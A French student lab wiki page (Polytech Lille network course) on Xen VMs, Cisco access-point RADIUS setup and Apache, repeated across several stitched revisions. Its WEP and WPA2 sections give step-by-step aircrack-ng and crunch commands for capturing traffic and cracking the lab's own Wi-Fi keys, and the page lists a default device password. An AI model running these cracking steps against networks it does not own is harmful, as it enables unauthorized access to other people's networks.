=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:23:18Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

=== Configuration des points d'accès Wi-Fi===
==== Création de la machine virtuelle ====

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:22:21Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:21:08Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

